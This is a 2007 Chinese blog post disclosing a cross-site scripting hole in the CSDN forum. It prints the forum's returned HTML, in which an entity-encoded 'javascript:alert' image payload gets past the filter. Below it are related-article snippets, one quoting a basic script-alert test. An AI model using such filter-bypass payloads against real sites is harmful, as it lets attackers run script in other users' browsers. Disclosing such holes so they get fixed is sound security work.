CSDN论坛的跨站漏洞

最新推荐文章于 2024-09-20 11:38:47 发布
最新推荐文章于 2024-09-20 11:38:47 发布
阅读量1.7k 收藏
点赞数
文章标签: class table button javascript input function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chaircat/article/details/1866980
版权

鉴于CSDN的论坛出现严重跨站漏洞...

本人决定暂且不上...特此声明... 截图

返回的代码如下...

一个编码就过了...真让人心寒啊...

  < input  type ="button"  value ="举报"  onclick ="window.location.href='mai'+'lto:'+'myc'+'sdn@c'+'sdn.n'+'et?subject=CSDN Topic Report';return false" >
  < input  type ="button"  value ="TOP"  onclick ="window.location.href='#top'" >   </ td ></ tr ></ table ></ td ></ tr ></ table >
< table  class ="item reply"  csdnid ="reply_45922064"  cellspacing ="1" >< tr >   < td  class ="info" >
    < ul >< li  class ="username" >< target ="_blank"  href ="http://hi.csdn.net/chaircat"  onmouseover ="javascript:showUserCard();" >< img  alt =""  src ="/u/ui/images/blank.gif"  class ="userstatus"   />< var  csdnid ="Reply_Username" > chaircat </ var ></ a ></ li >
    < li  class ="nickname" >< textarea  csdnid ="Reply_NickName"  cols =""  rows =""  readonly ="readonly" > chaircat </ textarea ></ li >
    < li  class ="grade" > 等 级: < img  alt =""  csdnid ="Reply_UserRank"  class ="grade user5"  src ="/u/ui/images/blank.gif"   /></ li ></ ul ></ td >
    < td  class ="main" >< table  cellspacing ="0"  style ="height: 100%;" >
   < tr >< td  class ="floor" >< span > 发表于: < var  csdnid ='Reply_Date' > 2007-11-05 08:10:28 </ var ></ span >< var  csdnid ="Reply_Layer" > 6 </ var > &nbsp; 得分: < var  csdnid ='Reply_Point' > 0 </ var ></ td ></ tr >
   < tr >< td  csdnid ="Reply_Body"  class ="content" > 啊哈哈哈哈~~~XSS~~~~  < br  />  好了~~~CSDN的兄弟们有的忙了~~~  < br  />  印象中DV过滤的还可以...还有Discuz...  < br  />   < img  src ="j&#97v&#97scrip&#116&#58alert(/跨站跨站I love you~~/)"   alt =""   /></ td ></ tr >< tr >< td  csdnid ="Reply_ModifyInfo" ></ td ></ tr >< tr >< td  class ="function" >
   <!--  <span>预留的文字链广告位</span> // -->
chaircat
关注
跨站漏洞
u010139452的博客
02-28 767
跨站漏洞   跨站漏洞是由于程序员在编写程序时对用户提交的数据没有做充分的合规性判断和进行HTML编码处理,直接把数据输出到浏览器客户端,这样导致用户可以提交一些特意构造的脚本代码或HTML标签代码,并在输出到浏览器时被执行。黑客利用跨站漏洞输入恶意的脚本代码,当恶意的代码被执行后就形成了所谓的跨站攻击。一般来说对于人机交互比较高的程序,比如论坛,留言板这类程序都比较容易进行跨站攻击。
XSS跨站漏洞详解
qq_44790964的博客
10-31 305
以前的会碰到一些注入 传文件的漏洞 但是现在的不会有很多了 挖xss干嘛呢?主要是就是让它来帮我们达到cookie 得到管理员后台 会把管理员的后台地址发送给你 挖掘 闭合 绕过 什么是XSS呢 什么是跨站脚本呢 XSS脚本实例 XSS的危害 javascript简介 一般xss攻击的是客户端浏览器 最终攻击影响的是浏览器 document对象 标签 属性 元素 样式 都可以调用 javas...
伪造gif文件的处理
12-02
用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施
跨站请求伪造漏洞
2201_75572825的博客
08-14 837
A网访问B网服务器的一些需要认证的资源的时候,如果没有Cookie信息,服务器是拒绝访问的,那么A网就无法进行恶意操作。而伪造成B网的请求,就可以将B网的Cookie一起发到B服务器,这个时候就服务器就认为该请求是合法的,就会给出正确的响应,这个时候,A网就达到目的了。一个网A中发起一个到网B的请求,而这个请求是经过了伪装的,伪装操作达到的目的就是让请求看起来像是从网B中发起的,也就是说,让B网所在的服务器端误以为该请求是从自己网发起的,而不是从A网发起的。
跨站脚本漏洞-XSS
夜行者的博客
02-18 1773
xss攻击是指利用网页的漏洞注入恶意的指令代码到网页,使得用户加载并执行攻击者恶意制造的网页程序,XSS攻击可以窃取cookie从而获得用户的账号和个人信息,网挂马,有限的键盘信息,发送广告和垃圾短息。 XSS漏洞分为三种,存储型,反射型和DOM型。 检测方法: 1.通过扫描工具appscan或者burpsuite工具扫描,查看与验证扫描结果中的XSS漏洞 2.反射型XSS,在请求的url的参数后面拼接XSS脚本,看是否能正常执行 3.存储型XSS,在保存数据的时候输入XSS脚本,检查数据是否能
【Web漏洞探索】跨站脚本漏洞
kjcxmx的博客
08-03 4002
跨站脚本(Cross-site scripting简称为"CSS",为避免与前端叠成样式表的缩写"CSS"冲突,故称为XSS)允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网相互隔离。跨站点脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害者用户在应用程序中具有特权访问权限,那么攻击者可能能够完全控制应用程序的所有功能和数据。XSS跨站脚本是一种网应用程序的安全漏洞攻击,是代码注入的一种。...
(保姆级教学)跨站请求伪造漏洞
m0_63436163的博客
04-19 1634
跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。
跨站脚本攻击漏洞
Zxdwr520的博客
07-30 460
漏洞描述:由于系统没有对漏洞参数进行任何的特殊符号以及敏感字符串的过滤而导致的 如在输入框中输入:<script type="text/javascript">alert(1);</script> 会弹框显示1 解决办法: 对输入框输入的value值进行过滤特殊字符,这样在用户输入特殊字符后会自动清除掉 function stringFilterChart(str) { var pattern = new RegExp("[`~!@#$^&*=|{}...
jsp页面中的跨站脚本漏洞修复
laoshanbizu的专栏
01-23 680
最近公司负责的几个系统中老有漏洞被搜出,多少都是JSP跨站脚本漏洞攻击,总结出的原因,无外呼是在跳转到JSP的页面中带有参数,然后JSP页面接收到参数后没有对一些特殊字符进行过滤,当然,还有一些其他的情况,比如,在页面中有输入框,需要用户手动输入内容时,都有可能出现这种攻击,下面是我针对JSP页面接收参数时,对参数进行过滤处理的方法,可能不全,还请大神指点! 请求链接: http://a.b...
漏洞笔记】jQuery跨站脚本
TeamsSix 的 CSDN 空间
11-20 2082
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQuery:jQuery是美国程序员John Resig所研发的一套开源、浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
XSS跨站脚本漏洞简介、原理及防护方法
m0_54899775的博客
03-21 7901
XSS跨站脚本漏洞简介、原理及防护方法 XSS跨站漏洞原理及防护
渗透测试工具:跨站脚本漏洞检测---Xsser
gao646467783的博客
01-27 3705
文章目录简介:用法:(一)、Options:(二)、特别的用法:(三)、选择目标:(四)、 现测HTTP/HTTPS的连接类型:(五)、 配置请求:(六)、 系统验校器:(七)、 选择攻击向量(s):(八)、选择Bypasser(s):(九)、 特殊的技巧:(十)、 Select Final injection(s):(十一)、 Special Final injection(s):(十二)、 混杂模式:(十三)、 Reporting:(十四)、Miscellaneous: 简介: 跨站脚本者是一个自动框架
20-1 XSS(跨站脚本攻击)漏洞介绍
weixin_43263566的博客
01-07 1161
XSS(跨站脚本攻击)是一种常见的计算机安全漏洞,也是Web应用中最主流的攻击方式之一。它利用网接收用户提交数据时未进行足够的转义处理或过滤不足的缺点,将恶意代码嵌入到Web页面中。当其他用户访问该页面时,嵌入的代码会被执行,从而导致盗取用户资料、利用用户身份进行某种动作或对访问者进行病毒侵害等恶意行为。XSS攻击通常基于JavaScript完成,因为JavaScript能够灵活地操作HTML、CSS和浏览器,给了XSS攻击带来了很大的灵活性。
保护网安全:学习蓝莲花的安装和使用,复现跨站脚本攻击漏洞及XSS接收平台
weixin_43263566的博客
08-29 1016
攻击者将恶意脚本注入到目标网的数据库中,然后其他用户在访问包含该恶意脚本的页面时,从数据库中读取并执行该恶意脚本。
Babel
最新发布
小秀的博客
09-20 418
它的主要作用是为了确保在不同浏览器和环境中运行 JavaScript 代码时保持一致的行为,尤其是提供对较新 ECMAScript 特性(如 Promise、Symbol、Object.assign 等)的支持。随着 JavaScript 标准不断更新,新的特性和功能被添加,但并不是所有的浏览器都能及时支持这些新特性。core-js 通常与 Babel 一起使用。core-js 是模块化的,这意味着开发者可以按需引入自己需要的 polyfill,而不是全部引入,这不仅能减少代码体积,还有助于提高性能。
JavaScript】LeetCode:707设计链表
weixin_45980065的博客
09-14 735
【代码】【JavaScript】LeetCode:707设计链表。
使用 uni-app 开发微信小程序的详细指南
2301_79685859的博客
09-16 1073
uni-app是一个使用 Vue.js 框架开发平台应用的前端框架。开发者通过编写一套代码,可以生成多端应用,包括 H5、iOS、Android、微信小程序、支付宝小程序、字节跳动小程序等。
vue 案例使用
buhuidage的博客
09-17 305
加上show-password就行。el-switch 按键的使用。
基于python+django+vue的旅游网系统
计算机学姐的博客
09-17 1964
【2025最新】基于协同过滤+python+django+vue+MySQL的旅游网系统,前后端分离。
web漏洞教程 csdn
01-17
1. 常见Web漏洞类型的介绍,如跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、SQL注入、文件包含漏洞等。通过学习这些漏洞类型,可以帮助开发者和安全专家了解这些漏洞的工作原理和危害程度。 2. Web漏洞的检测方法和...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值